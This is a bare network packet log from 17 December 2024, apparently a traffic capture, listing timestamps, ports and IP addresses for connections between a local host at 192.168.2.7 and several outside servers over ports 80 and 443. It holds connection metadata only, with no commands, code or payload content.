Dec 17, 2024 08:21:54.420787096 CET	49698	80	192.168.2.7	192.229.221.95
Dec 17, 2024 08:21:56.047179937 CET	49762	80	192.168.2.7	138.124.60.133
Dec 17, 2024 08:22:11.348556042 CET	443	49717	104.98.116.138	192.168.2.7
Dec 17, 2024 08:22:11.348784924 CET	49717	443	192.168.2.7	104.98.116.138
Dec 17, 2024 08:22:43.133079052 CET	49887	443	192.168.2.7	149.154.167.99
Dec 17, 2024 08:22:43.133120060 CET	443	49887	149.154.167.99	192.168.2.7
Dec 17, 2024 08:22:43.133306980 CET	49887	443	192.168.2.7	149.154.167.99
Dec 17, 2024 08:22:43.150119066 CET	49887	443	192.168.2.7	149.154.167.99
Dec 17, 2024 08:22:43.150147915 CET	443	49887	149.154.167.99	192.168.2.7
Dec 17, 2024 08:22:44.519649982 CET	443	49887	149.154.167.99	192.168.2.7
Dec 17, 2024 08:22:44.519759893 CET	49887	443	192.168.2.7	149.154.167.99
Dec 17, 2024 08:22:44.571346045 CET	49887	443	192.168.2.7	149.154.167.99
Dec 17, 2024 08:22:44.571381092 CET	443	49887	149.154.167.99	192.168.2.7
Dec 17, 2024 08:22:44.572335005 CET	443	49887	149.154.167.99	192.168.2.7
Dec 17, 2024 08:22:44.572406054 CET	49887	443	192.168.2.7	149.154.167.99
Dec 17, 2024 08:22:44.575380087 CET	49887	443	192.168.2.7	149.154.167.99
Dec 17, 2024 08:22:44.623337030 CET	443	49887	149.154.167.99	192.168.2.7
Dec 17, 2024 08:22:45.064742088 CET	443	49887	149.154.167.99	192.168.2.7
Dec 17, 2024 08:22:45.064776897 CET	443	49887	149.154.167.99	192.168.2.7
Dec 17, 2024 08:22:45.064815998 CET	443	49887	149.154.167.99	192.168.2.7
Dec 17, 2024 08:22:45.064847946 CET	443	49887	149.154.167.99	192.168.2.7
Dec 17, 2024 08:22:45.064860106 CET	49887	443	192.168.2.7	149.154.167.99
Dec 17, 2024 08:22:45.064908028 CET	49887	443	192.168.2.7	149.154.167.99
Dec 17, 2024 08:22:45.067536116 CET	49887	443	192.168.2.7	149.154.167.99
Dec 17, 2024 08:22:45.067563057 CET	443	49887	149.154.167.99	192.168.2.7
Dec 17, 2024 08:22:45.465313911 CET	49894	443	192.168.2.7	116.203.12.114
Dec 17, 2024 08:22:45.465357065 CET	443	49894	116.203.12.114	192.168.2.7
Dec 17, 2024 08:22:45.465461969 CET	49894	443	192.168.2.7	116.203.12.114
Dec 17, 2024 08:22:45.465895891 CET	49894	443	192.168.2.7	116.203.12.114
Dec 17, 2024 08:22:45.465909004 CET	443	49894	116.203.12.114	192.168.2.7
Dec 17, 2024 08:22:47.316859961 CET	443	49894	116.203.12.114	192.168.2.7
Dec 17, 2024 08:22:47.316941023 CET	49894	443	192.168.2.7	116.203.12.114
Dec 17, 2024 08:22:47.369077921 CET	49894	443	192.168.2.7	116.203.12.114
Dec 17, 2024 08:22:47.369115114 CET	443	49894	116.203.12.114	192.168.2.7
Dec 17, 2024 08:22:47.369507074 CET	443	49894	116.203.12.114	192.168.2.7
Dec 17, 2024 08:22:47.369607925 CET	49894	443	192.168.2.7	116.203.12.114
Dec 17, 2024 08:22:47.373749971 CET	49894	443	192.168.2.7	116.203.12.114
Dec 17, 2024 08:22:47.415328979 CET	443	49894	116.203.12.114	192.168.2.7
Dec 17, 2024 08:22:48.076484919 CET	443	49894	116.203.12.114	192.168.2.7
Dec 17, 2024 08:22:48.076582909 CET	49894	443	192.168.2.7	116.203.12.114
Dec 17, 2024 08:22:48.076596975 CET	443	49894	116.203.12.114	192.168.2.7
Dec 17, 2024 08:22:48.076669931 CET	49894	443	192.168.2.7	116.203.12.114
Dec 17, 2024 08:22:48.186444998 CET	49894	443	192.168.2.7	116.203.12.114
Dec 17, 2024 08:22:48.186521053 CET	443	49894	116.203.12.114	192.168.2.7
Dec 17, 2024 08:22:48.218034983 CET	49902	443	192.168.2.7	116.203.12.114
Dec 17, 2024 08:22:48.218081951 CET	443	49902	116.203.12.114	192.168.2.7
Dec 17, 2024 08:22:48.218173981 CET	49902	443	192.168.2.7	116.203.12.114
Dec 17, 2024 08:22:48.218560934 CET	49902	443	192.168.2.7	116.203.12.114
Dec 17, 2024 08:22:48.218580961 CET	443	49902	116.203.12.114	192.168.2.7
Dec 17, 2024 08:22:49.618144035 CET	443	49902	116.203.12.114	192.168.2.7
Dec 17, 2024 08:22:49.618308067 CET	49902	443	192.168.2.7	116.203.12.114
Dec 17, 2024 08:22:49.619009018 CET	49902	443	192.168.2.7	116.203.12.114
Dec 17, 2024 08:22:49.619039059 CET	443	49902	116.203.12.114	192.168.2.7
Dec 17, 2024 08:22:49.620867014 CET	49902	443	192.168.2.7	116.203.12.114
Dec 17, 2024 08:22:49.620884895 CET	443	49902	116.203.12.114	192.168.2.7
Dec 17, 2024 08:22:50.511975050 CET	443	49902	116.203.12.114	192.168.2.7
Dec 17, 2024 08:22:50.512118101 CET	443	49902	116.203.12.114	192.168.2.7
Dec 17, 2024 08:22:50.512192965 CET	49902	443	192.168.2.7	116.203.12.114
Dec 17, 2024 08:22:50.512193918 CET	49902	443	192.168.2.7	116.203.12.114
Dec 17, 2024 08:22:50.512489080 CET	49902	443	192.168.2.7	116.203.12.114
Dec 17, 2024 08:22:50.512533903 CET	443	49902	116.203.12.114	192.168.2.7
Dec 17, 2024 08:22:50.513881922 CET	49907	443	192.168.2.7	116.203.12.114
Dec 17, 2024 08:22:50.513931036 CET	443	49907	116.203.12.114	192.168.2.7
Dec 17, 2024 08:22:50.514008999 CET	49907	443	192.168.2.7	116.203.12.114
Dec 17, 2024 08:22:50.514209986 CET	49907	443	192.168.2.7	116.203.12.114
Dec 17, 2024 08:22:50.514226913 CET	443	49907	116.203.12.114	192.168.2.7
Dec 17, 2024 08:22:52.027605057 CET	443	49907	116.203.12.114	192.168.2.7
Dec 17, 2024 08:22:52.027704000 CET	49907	443	192.168.2.7	116.203.12.114
Dec 17, 2024 08:22:52.040195942 CET	49907	443	192.168.2.7	116.203.12.114
Dec 17, 2024 08:22:52.040216923 CET	443	49907	116.203.12.114	192.168.2.7
Dec 17, 2024 08:22:52.076699972 CET	49907	443	192.168.2.7	116.203.12.114
Dec 17, 2024 08:22:52.076720953 CET	443	49907	116.203.12.114	192.168.2.7
Dec 17, 2024 08:22:52.919383049 CET	443	49907	116.203.12.114	192.168.2.7
Dec 17, 2024 08:22:52.919430971 CET	443	49907	116.203.12.114	192.168.2.7
Dec 17, 2024 08:22:52.919445992 CET	49907	443	192.168.2.7	116.203.12.114
Dec 17, 2024 08:22:52.919462919 CET	443	49907	116.203.12.114	192.168.2.7
Dec 17, 2024 08:22:52.919485092 CET	49907	443	192.168.2.7	116.203.12.114
Dec 17, 2024 08:22:52.919507980 CET	443	49907	116.203.12.114	192.168.2.7
Dec 17, 2024 08:22:52.919517994 CET	49907	443	192.168.2.7	116.203.12.114
Dec 17, 2024 08:22:52.919549942 CET	49907	443	192.168.2.7	116.203.12.114
Dec 17, 2024 08:22:52.919708967 CET	49907	443	192.168.2.7	116.203.12.114
Dec 17, 2024 08:22:52.919728041 CET	443	49907	116.203.12.114	192.168.2.7
Dec 17, 2024 08:22:52.922036886 CET	49913	443	192.168.2.7	116.203.12.114
Dec 17, 2024 08:22:52.922082901 CET	443	49913	116.203.12.114	192.168.2.7
Dec 17, 2024 08:22:52.922148943 CET	49913	443	192.168.2.7	116.203.12.114
Dec 17, 2024 08:22:52.922395945 CET	49913	443	192.168.2.7	116.203.12.114
Dec 17, 2024 08:22:52.922408104 CET	443	49913	116.203.12.114	192.168.2.7
Dec 17, 2024 08:22:54.322901011 CET	443	49913	116.203.12.114	192.168.2.7
Dec 17, 2024 08:22:54.323038101 CET	49913	443	192.168.2.7	116.203.12.114
Dec 17, 2024 08:22:54.323834896 CET	49913	443	192.168.2.7	116.203.12.114
Dec 17, 2024 08:22:54.323853016 CET	443	49913	116.203.12.114	192.168.2.7
Dec 17, 2024 08:22:54.325896978 CET	49913	443	192.168.2.7	116.203.12.114
Dec 17, 2024 08:22:54.325915098 CET	443	49913	116.203.12.114	192.168.2.7
Dec 17, 2024 08:22:55.217354059 CET	443	49913	116.203.12.114	192.168.2.7
Dec 17, 2024 08:22:55.217381954 CET	443	49913	116.203.12.114	192.168.2.7
Dec 17, 2024 08:22:55.217412949 CET	49913	443	192.168.2.7	116.203.12.114
Dec 17, 2024 08:22:55.217434883 CET	443	49913	116.203.12.114	192.168.2.7
Dec 17, 2024 08:22:55.217449903 CET	49913	443	192.168.2.7	116.203.12.114
Dec 17, 2024 08:22:55.217449903 CET	443	49913	116.203.12.114	192.168.2.7
Dec 17, 2024 08:22:55.217475891 CET	49913	443	192.168.2.7	116.203.12.114
Dec 17, 2024 08:22:55.217502117 CET	49913	443	192.168.2.7	116.203.12.114
Dec 17, 2024 08:22:55.217819929 CET	49913	443	192.168.2.7	116.203.12.114
Dec 17, 2024 08:22:55.217835903 CET	443	49913	116.203.12.114	192.168.2.7
Dec 17, 2024 08:22:55.219961882 CET	49918	443	192.168.2.7	116.203.12.114
Dec 17, 2024 08:22:55.220002890 CET	443	49918	116.203.12.114	192.168.2.7
Dec 17, 2024 08:22:55.220086098 CET	49918	443	192.168.2.7	116.203.12.114
Dec 17, 2024 08:22:55.220365047 CET	49918	443	192.168.2.7	116.203.12.114
Dec 17, 2024 08:22:55.220386028 CET	443	49918	116.203.12.114	192.168.2.7
Dec 17, 2024 08:22:56.619617939 CET	443	49918	116.203.12.114	192.168.2.7
Dec 17, 2024 08:22:56.619739056 CET	49918	443	192.168.2.7	116.203.12.114
Dec 17, 2024 08:22:56.620404005 CET	49918	443	192.168.2.7	116.203.12.114
Dec 17, 2024 08:22:56.620421886 CET	443	49918	116.203.12.114	192.168.2.7
Dec 17, 2024 08:22:56.623205900 CET	49918	443	192.168.2.7	116.203.12.114
Dec 17, 2024 08:22:56.623224020 CET	443	49918	116.203.12.114	192.168.2.7
Dec 17, 2024 08:22:57.499506950 CET	443	49918	116.203.12.114	192.168.2.7
Dec 17, 2024 08:22:57.499578953 CET	443	49918	116.203.12.114	192.168.2.7
Dec 17, 2024 08:22:57.499604940 CET	49918	443	192.168.2.7	116.203.12.114
Dec 17, 2024 08:22:57.499640942 CET	49918	443	192.168.2.7	116.203.12.114
Dec 17, 2024 08:22:57.536449909 CET	49918	443	192.168.2.7	116.203.12.114
Dec 17, 2024 08:22:57.536479950 CET	443	49918	116.203.12.114	192.168.2.7
Dec 17, 2024 08:22:58.143460035 CET	49925	443	192.168.2.7	116.203.12.114
Dec 17, 2024 08:22:58.143556118 CET	443	49925	116.203.12.114	192.168.2.7
Dec 17, 2024 08:22:58.143651009 CET	49925	443	192.168.2.7	116.203.12.114
Dec 17, 2024 08:22:58.147263050 CET	49925	443	192.168.2.7	116.203.12.114
Dec 17, 2024 08:22:58.147304058 CET	443	49925	116.203.12.114	192.168.2.7
Dec 17, 2024 08:22:59.115081072 CET	49929	443	192.168.2.7	116.203.12.114
Dec 17, 2024 08:22:59.115129948 CET	443	49929	116.203.12.114	192.168.2.7
Dec 17, 2024 08:22:59.115253925 CET	49929	443	192.168.2.7	116.203.12.114
Dec 17, 2024 08:22:59.115493059 CET	49929	443	192.168.2.7	116.203.12.114
Dec 17, 2024 08:22:59.115504026 CET	443	49929	116.203.12.114	192.168.2.7
Dec 17, 2024 08:22:59.545362949 CET	443	49925	116.203.12.114	192.168.2.7
Dec 17, 2024 08:22:59.546066046 CET	49925	443	192.168.2.7	116.203.12.114
Dec 17, 2024 08:22:59.546698093 CET	49925	443	192.168.2.7	116.203.12.114
Dec 17, 2024 08:22:59.546713114 CET	443	49925	116.203.12.114	192.168.2.7
Dec 17, 2024 08:22:59.548505068 CET	49925	443	192.168.2.7	116.203.12.114
Dec 17, 2024 08:22:59.548531055 CET	443	49925	116.203.12.114	192.168.2.7
Dec 17, 2024 08:22:59.548562050 CET	49925	443	192.168.2.7	116.203.12.114
Dec 17, 2024 08:22:59.548573017 CET	443	49925	116.203.12.114	192.168.2.7
Dec 17, 2024 08:23:00.519493103 CET	443	49929	116.203.12.114	192.168.2.7
Dec 17, 2024 08:23:00.519634962 CET	49929	443	192.168.2.7	116.203.12.114
Dec 17, 2024 08:23:00.525758028 CET	49929	443	192.168.2.7	116.203.12.114
Dec 17, 2024 08:23:00.525769949 CET	443	49929	116.203.12.114	192.168.2.7
Dec 17, 2024 08:23:00.527489901 CET	49929	443	192.168.2.7	116.203.12.114
Dec 17, 2024 08:23:00.527501106 CET	443	49929	116.203.12.114	192.168.2.7
Dec 17, 2024 08:23:00.647595882 CET	443	49925	116.203.12.114	192.168.2.7
Dec 17, 2024 08:23:00.647700071 CET	49925	443	192.168.2.7	116.203.12.114
Dec 17, 2024 08:23:00.647739887 CET	443	49925	116.203.12.114	192.168.2.7
Dec 17, 2024 08:23:00.647787094 CET	443	49925	116.203.12.114	192.168.2.7
Dec 17, 2024 08:23:00.647804022 CET	49925	443	192.168.2.7	116.203.12.114
Dec 17, 2024 08:23:00.647840023 CET	49925	443	192.168.2.7	116.203.12.114
Dec 17, 2024 08:23:00.649182081 CET	49925	443	192.168.2.7	116.203.12.114
Dec 17, 2024 08:23:00.649218082 CET	443	49925	116.203.12.114	192.168.2.7
Dec 17, 2024 08:23:01.525734901 CET	443	49929	116.203.12.114	192.168.2.7
Dec 17, 2024 08:23:01.525821924 CET	443	49929	116.203.12.114	192.168.2.7
Dec 17, 2024 08:23:01.525933981 CET	49929	443	192.168.2.7	116.203.12.114
Dec 17, 2024 08:23:01.525933981 CET	49929	443	192.168.2.7	116.203.12.114
Dec 17, 2024 08:23:01.704982996 CET	49929	443	192.168.2.7	116.203.12.114
Dec 17, 2024 08:23:01.705012083 CET	443	49929	116.203.12.114	192.168.2.7
Dec 17, 2024 08:23:02.904172897 CET	49940	443	192.168.2.7	172.217.19.228
Dec 17, 2024 08:23:02.904220104 CET	443	49940	172.217.19.228	192.168.2.7
Dec 17, 2024 08:23:02.904282093 CET	49940	443	192.168.2.7	172.217.19.228
Dec 17, 2024 08:23:02.904479027 CET	49940	443	192.168.2.7	172.217.19.228
Dec 17, 2024 08:23:02.904489040 CET	443	49940	172.217.19.228	192.168.2.7
Dec 17, 2024 08:23:03.133797884 CET	49941	443	192.168.2.7	172.217.19.228
Dec 17, 2024 08:23:03.133840084 CET	443	49941	172.217.19.228	192.168.2.7
Dec 17, 2024 08:23:03.133903027 CET	49941	443	192.168.2.7	172.217.19.228
Dec 17, 2024 08:23:03.134145021 CET	49941	443	192.168.2.7	172.217.19.228
Dec 17, 2024 08:23:03.134162903 CET	443	49941	172.217.19.228	192.168.2.7
Dec 17, 2024 08:23:03.135684013 CET	49942	443	192.168.2.7	172.217.19.228
Dec 17, 2024 08:23:03.135729074 CET	443	49942	172.217.19.228	192.168.2.7
Dec 17, 2024 08:23:03.135792971 CET	49942	443	192.168.2.7	172.217.19.228
Dec 17, 2024 08:23:03.136074066 CET	49942	443	192.168.2.7	172.217.19.228
Dec 17, 2024 08:23:03.136090040 CET	443	49942	172.217.19.228	192.168.2.7
Dec 17, 2024 08:23:03.568480968 CET	49948	443	192.168.2.7	172.217.19.228
Dec 17, 2024 08:23:03.568521023 CET	443	49948	172.217.19.228	192.168.2.7
Dec 17, 2024 08:23:03.568768978 CET	49948	443	192.168.2.7	172.217.19.228
Dec 17, 2024 08:23:03.569586992 CET	49948	443	192.168.2.7	172.217.19.228
Dec 17, 2024 08:23:03.569597960 CET	443	49948	172.217.19.228	192.168.2.7
Dec 17, 2024 08:23:04.610280037 CET	443	49940	172.217.19.228	192.168.2.7
Dec 17, 2024 08:23:04.660327911 CET	49940	443	192.168.2.7	172.217.19.228
Dec 17, 2024 08:23:04.674741030 CET	49940	443	192.168.2.7	172.217.19.228
Dec 17, 2024 08:23:04.674752951 CET	443	49940	172.217.19.228	192.168.2.7
Dec 17, 2024 08:23:04.677721977 CET	443	49940	172.217.19.228	192.168.2.7
Dec 17, 2024 08:23:04.677804947 CET	49940	443	192.168.2.7	172.217.19.228
Dec 17, 2024 08:23:04.686678886 CET	49940	443	192.168.2.7	172.217.19.228
Dec 17, 2024 08:23:04.686837912 CET	443	49940	172.217.19.228	192.168.2.7
Dec 17, 2024 08:23:04.686871052 CET	49940	443	192.168.2.7	172.217.19.228
Dec 17, 2024 08:23:04.727327108 CET	443	49940	172.217.19.228	192.168.2.7
Dec 17, 2024 08:23:04.730971098 CET	49940	443	192.168.2.7	172.217.19.228
Dec 17, 2024 08:23:04.730983019 CET	443	49940	172.217.19.228	192.168.2.7
Dec 17, 2024 08:23:04.788826942 CET	49940	443	192.168.2.7	172.217.19.228
Dec 17, 2024 08:23:04.826514006 CET	443	49942	172.217.19.228	192.168.2.7
Dec 17, 2024 08:23:04.828232050 CET	49942	443	192.168.2.7	172.217.19.228
Dec 17, 2024 08:23:04.828258038 CET	443	49942	172.217.19.228	192.168.2.7
Dec 17, 2024 08:23:04.828664064 CET	443	49941	172.217.19.228	192.168.2.7
Dec 17, 2024 08:23:04.828988075 CET	49941	443	192.168.2.7	172.217.19.228
Dec 17, 2024 08:23:04.829008102 CET	443	49941	172.217.19.228	192.168.2.7
Dec 17, 2024 08:23:04.829334021 CET	443	49942	172.217.19.228	192.168.2.7
Dec 17, 2024 08:23:04.829453945 CET	49942	443	192.168.2.7	172.217.19.228
Dec 17, 2024 08:23:04.830050945 CET	49942	443	192.168.2.7	172.217.19.228
Dec 17, 2024 08:23:04.830152988 CET	443	49942	172.217.19.228	192.168.2.7
Dec 17, 2024 08:23:04.830296040 CET	49942	443	192.168.2.7	172.217.19.228
Dec 17, 2024 08:23:04.830306053 CET	443	49942	172.217.19.228	192.168.2.7
Dec 17, 2024 08:23:04.832722902 CET	443	49941	172.217.19.228	192.168.2.7
Dec 17, 2024 08:23:04.832808971 CET	49941	443	192.168.2.7	172.217.19.228
Dec 17, 2024 08:23:04.833139896 CET	49941	443	192.168.2.7	172.217.19.228
Dec 17, 2024 08:23:04.833239079 CET	49941	443	192.168.2.7	172.217.19.228
Dec 17, 2024 08:23:04.833245039 CET	443	49941	172.217.19.228	192.168.2.7
Dec 17, 2024 08:23:04.833306074 CET	443	49941	172.217.19.228	192.168.2.7
Dec 17, 2024 08:23:04.877456903 CET	49942	443	192.168.2.7	172.217.19.228
Dec 17, 2024 08:23:04.877506971 CET	49941	443	192.168.2.7	172.217.19.228
Dec 17, 2024 08:23:04.877536058 CET	443	49941	172.217.19.228	192.168.2.7
Dec 17, 2024 08:23:04.934614897 CET	49941	443	192.168.2.7	172.217.19.228
Dec 17, 2024 08:23:05.300240993 CET	443	49948	172.217.19.228	192.168.2.7
Dec 17, 2024 08:23:05.349302053 CET	49948	443	192.168.2.7	172.217.19.228
Dec 17, 2024 08:23:05.428999901 CET	49948	443	192.168.2.7	172.217.19.228
Dec 17, 2024 08:23:05.429028034 CET	443	49948	172.217.19.228	192.168.2.7
Dec 17, 2024 08:23:05.430264950 CET	443	49948	172.217.19.228	192.168.2.7
Dec 17, 2024 08:23:05.430321932 CET	49948	443	192.168.2.7	172.217.19.228
Dec 17, 2024 08:23:05.435364008 CET	49948	443	192.168.2.7	172.217.19.228
Dec 17, 2024 08:23:05.435426950 CET	443	49948	172.217.19.228	192.168.2.7
Dec 17, 2024 08:23:05.436062098 CET	49948	443	192.168.2.7	172.217.19.228
Dec 17, 2024 08:23:05.436069965 CET	443	49948	172.217.19.228	192.168.2.7
Dec 17, 2024 08:23:05.448930025 CET	49942	443	192.168.2.7	172.217.19.228
Dec 17, 2024 08:23:05.449028969 CET	443	49942	172.217.19.228	192.168.2.7
Dec 17, 2024 08:23:05.449079990 CET	49942	443	192.168.2.7	172.217.19.228
Dec 17, 2024 08:23:05.461333036 CET	443	49940	172.217.19.228	192.168.2.7
Dec 17, 2024 08:23:05.461523056 CET	443	49940	172.217.19.228	192.168.2.7
Dec 17, 2024 08:23:05.461571932 CET	49940	443	192.168.2.7	172.217.19.228
Dec 17, 2024 08:23:05.476102114 CET	49948	443	192.168.2.7	172.217.19.228
Dec 17, 2024 08:23:05.686119080 CET	443	49941	172.217.19.228	192.168.2.7
Dec 17, 2024 08:23:05.686161995 CET	443	49941	172.217.19.228	192.168.2.7
Dec 17, 2024 08:23:05.686194897 CET	443	49941	172.217.19.228	192.168.2.7
Dec 17, 2024 08:23:05.686208963 CET	49941	443	192.168.2.7	172.217.19.228
Dec 17, 2024 08:23:05.686227083 CET	443	49941	172.217.19.228	192.168.2.7
Dec 17, 2024 08:23:05.686239004 CET	443	49941	172.217.19.228	192.168.2.7
Dec 17, 2024 08:23:05.686263084 CET	49941	443	192.168.2.7	172.217.19.228
Dec 17, 2024 08:23:05.687657118 CET	49940	443	192.168.2.7	172.217.19.228
Dec 17, 2024 08:23:05.687679052 CET	443	49940	172.217.19.228	192.168.2.7
Dec 17, 2024 08:23:05.699644089 CET	443	49941	172.217.19.228	192.168.2.7
Dec 17, 2024 08:23:05.699683905 CET	443	49941	172.217.19.228	192.168.2.7
Dec 17, 2024 08:23:05.699697018 CET	49941	443	192.168.2.7	172.217.19.228
Dec 17, 2024 08:23:05.699732065 CET	443	49941	172.217.19.228	192.168.2.7
Dec 17, 2024 08:23:05.699785948 CET	49941	443	192.168.2.7	172.217.19.228
Dec 17, 2024 08:23:05.704092026 CET	443	49941	172.217.19.228	192.168.2.7
Dec 17, 2024 08:23:05.717957973 CET	443	49941	172.217.19.228	192.168.2.7
Dec 17, 2024 08:23:05.718046904 CET	49941	443	192.168.2.7	172.217.19.228
Dec 17, 2024 08:23:05.718080044 CET	443	49941	172.217.19.228	192.168.2.7
Dec 17, 2024 08:23:05.767874002 CET	49941	443	192.168.2.7	172.217.19.228
Dec 17, 2024 08:23:05.806288958 CET	443	49941	172.217.19.228	192.168.2.7
Dec 17, 2024 08:23:05.846250057 CET	49941	443	192.168.2.7	172.217.19.228
Dec 17, 2024 08:23:05.846282005 CET	443	49941	172.217.19.228	192.168.2.7
Dec 17, 2024 08:23:05.879054070 CET	443	49941	172.217.19.228	192.168.2.7
Dec 17, 2024 08:23:05.879112959 CET	49941	443	192.168.2.7	172.217.19.228
Dec 17, 2024 08:23:05.879148960 CET	443	49941	172.217.19.228	192.168.2.7
Dec 17, 2024 08:23:05.888782978 CET	443	49941	172.217.19.228	192.168.2.7
Dec 17, 2024 08:23:05.888839960 CET	49941	443	192.168.2.7	172.217.19.228
Dec 17, 2024 08:23:05.888870955 CET	443	49941	172.217.19.228	192.168.2.7
Dec 17, 2024 08:23:05.899234056 CET	443	49941	172.217.19.228	192.168.2.7
Dec 17, 2024 08:23:05.899290085 CET	49941	443	192.168.2.7	172.217.19.228
Dec 17, 2024 08:23:05.899333000 CET	443	49941	172.217.19.228	192.168.2.7
Dec 17, 2024 08:23:05.912141085 CET	443	49941	172.217.19.228	192.168.2.7
Dec 17, 2024 08:23:05.912201881 CET	49941	443	192.168.2.7	172.217.19.228
Dec 17, 2024 08:23:05.912246943 CET	443	49941	172.217.19.228	192.168.2.7
Dec 17, 2024 08:23:05.925667048 CET	443	49941	172.217.19.228	192.168.2.7
Dec 17, 2024 08:23:05.925723076 CET	49941	443	192.168.2.7	172.217.19.228
Dec 17, 2024 08:23:05.925755978 CET	443	49941	172.217.19.228	192.168.2.7
Dec 17, 2024 08:23:05.937599897 CET	443	49941	172.217.19.228	192.168.2.7
Dec 17, 2024 08:23:05.937670946 CET	49941	443	192.168.2.7	172.217.19.228
Dec 17, 2024 08:23:05.937704086 CET	443	49941	172.217.19.228	192.168.2.7
Dec 17, 2024 08:23:05.952737093 CET	443	49941	172.217.19.228	192.168.2.7
Dec 17, 2024 08:23:05.952807903 CET	49941	443	192.168.2.7	172.217.19.228
Dec 17, 2024 08:23:05.952828884 CET	443	49941	172.217.19.228	192.168.2.7
Dec 17, 2024 08:23:05.965246916 CET	443	49941	172.217.19.228	192.168.2.7
Dec 17, 2024 08:23:05.965300083 CET	49941	443	192.168.2.7	172.217.19.228
Dec 17, 2024 08:23:05.965321064 CET	443	49941	172.217.19.228	192.168.2.7
Dec 17, 2024 08:23:05.978682041 CET	443	49941	172.217.19.228	192.168.2.7
Dec 17, 2024 08:23:05.978735924 CET	49941	443	192.168.2.7	172.217.19.228
Dec 17, 2024 08:23:05.978764057 CET	443	49941	172.217.19.228	192.168.2.7
Dec 17, 2024 08:23:05.993724108 CET	443	49941	172.217.19.228	192.168.2.7
Dec 17, 2024 08:23:05.993779898 CET	49941	443	192.168.2.7	172.217.19.228
Dec 17, 2024 08:23:05.993803978 CET	443	49941	172.217.19.228	192.168.2.7
Dec 17, 2024 08:23:06.002728939 CET	443	49941	172.217.19.228	192.168.2.7
Dec 17, 2024 08:23:06.002796888 CET	49941	443	192.168.2.7	172.217.19.228
Dec 17, 2024 08:23:06.002818108 CET	443	49941	172.217.19.228	192.168.2.7
Dec 17, 2024 08:23:06.016415119 CET	443	49941	172.217.19.228	192.168.2.7
Dec 17, 2024 08:23:06.016494036 CET	49941	443	192.168.2.7	172.217.19.228
Dec 17, 2024 08:23:06.016515970 CET	443	49941	172.217.19.228	192.168.2.7
Dec 17, 2024 08:23:06.069684982 CET	49941	443	192.168.2.7	172.217.19.228
Dec 17, 2024 08:23:06.069720030 CET	443	49941	172.217.19.228	192.168.2.7
Dec 17, 2024 08:23:06.070097923 CET	443	49941	172.217.19.228	192.168.2.7
Dec 17, 2024 08:23:06.070458889 CET	49941	443	192.168.2.7	172.217.19.228
Dec 17, 2024 08:23:06.070467949 CET	443	49941	172.217.19.228	192.168.2.7
Dec 17, 2024 08:23:06.080852985 CET	443	49941	172.217.19.228	192.168.2.7
Dec 17, 2024 08:23:06.080923080 CET	443	49941	172.217.19.228	192.168.2.7
Dec 17, 2024 08:23:06.080935955 CET	49941	443	192.168.2.7	172.217.19.228
Dec 17, 2024 08:23:06.080971956 CET	443	49941	172.217.19.228	192.168.2.7
Dec 17, 2024 08:23:06.081021070 CET	49941	443	192.168.2.7	172.217.19.228
Dec 17, 2024 08:23:06.093334913 CET	443	49941	172.217.19.228	192.168.2.7
Dec 17, 2024 08:23:06.109688997 CET	443	49941	172.217.19.228	192.168.2.7
Dec 17, 2024 08:23:06.109718084 CET	443	49941	172.217.19.228	192.168.2.7
Dec 17, 2024 08:23:06.109769106 CET	49941	443	192.168.2.7	172.217.19.228
Dec 17, 2024 08:23:06.109800100 CET	443	49941	172.217.19.228	192.168.2.7
Dec 17, 2024 08:23:06.109843969 CET	49941	443	192.168.2.7	172.217.19.228
Dec 17, 2024 08:23:06.117410898 CET	443	49941	172.217.19.228	192.168.2.7
Dec 17, 2024 08:23:06.128978968 CET	443	49941	172.217.19.228	192.168.2.7
Dec 17, 2024 08:23:06.129062891 CET	443	49941	172.217.19.228	192.168.2.7
Dec 17, 2024 08:23:06.129117966 CET	49941	443	192.168.2.7	172.217.19.228
Dec 17, 2024 08:23:06.129152060 CET	443	49941	172.217.19.228	192.168.2.7
Dec 17, 2024 08:23:06.129203081 CET	49941	443	192.168.2.7	172.217.19.228
Dec 17, 2024 08:23:06.140607119 CET	443	49941	172.217.19.228	192.168.2.7
Dec 17, 2024 08:23:06.140764952 CET	443	49941	172.217.19.228	192.168.2.7
Dec 17, 2024 08:23:06.140835047 CET	49941	443	192.168.2.7	172.217.19.228
Dec 17, 2024 08:23:06.140867949 CET	443	49941	172.217.19.228	192.168.2.7
Dec 17, 2024 08:23:06.146089077 CET	443	49948	172.217.19.228	192.168.2.7
Dec 17, 2024 08:23:06.146224022 CET	443	49948	172.217.19.228	192.168.2.7
Dec 17, 2024 08:23:06.146289110 CET	49948	443	192.168.2.7	172.217.19.228
Dec 17, 2024 08:23:06.147279024 CET	49948	443	192.168.2.7	172.217.19.228
Dec 17, 2024 08:23:06.147301912 CET	443	49948	172.217.19.228	192.168.2.7
Dec 17, 2024 08:23:06.152024984 CET	443	49941	172.217.19.228	192.168.2.7
Dec 17, 2024 08:23:06.152087927 CET	49941	443	192.168.2.7	172.217.19.228
Dec 17, 2024 08:23:06.152121067 CET	443	49941	172.217.19.228	192.168.2.7
Dec 17, 2024 08:23:06.162796974 CET	443	49941	172.217.19.228	192.168.2.7
Dec 17, 2024 08:23:06.162857056 CET	49941	443	192.168.2.7	172.217.19.228
Dec 17, 2024 08:23:06.162867069 CET	443	49941	172.217.19.228	192.168.2.7
Dec 17, 2024 08:23:06.173496008 CET	443	49941	172.217.19.228	192.168.2.7
Dec 17, 2024 08:23:06.173567057 CET	49941	443	192.168.2.7	172.217.19.228
Dec 17, 2024 08:23:06.173578978 CET	443	49941	172.217.19.228	192.168.2.7
Dec 17, 2024 08:23:06.183697939 CET	443	49941	172.217.19.228	192.168.2.7
Dec 17, 2024 08:23:06.183764935 CET	49941	443	192.168.2.7	172.217.19.228
Dec 17, 2024 08:23:06.183815002 CET	443	49941	172.217.19.228	192.168.2.7
Dec 17, 2024 08:23:06.195023060 CET	443	49941	172.217.19.228	192.168.2.7
Dec 17, 2024 08:23:06.195192099 CET	49941	443	192.168.2.7	172.217.19.228
Dec 17, 2024 08:23:06.195240021 CET	443	49941	172.217.19.228	192.168.2.7
Dec 17, 2024 08:23:06.202943087 CET	443	49941	172.217.19.228	192.168.2.7
Dec 17, 2024 08:23:06.203006029 CET	49941	443	192.168.2.7	172.217.19.228
Dec 17, 2024 08:23:06.203037977 CET	443	49941	172.217.19.228	192.168.2.7
Dec 17, 2024 08:23:06.212941885 CET	443	49941	172.217.19.228	192.168.2.7
Dec 17, 2024 08:23:06.213089943 CET	49941	443	192.168.2.7	172.217.19.228
Dec 17, 2024 08:23:06.213121891 CET	443	49941	172.217.19.228	192.168.2.7
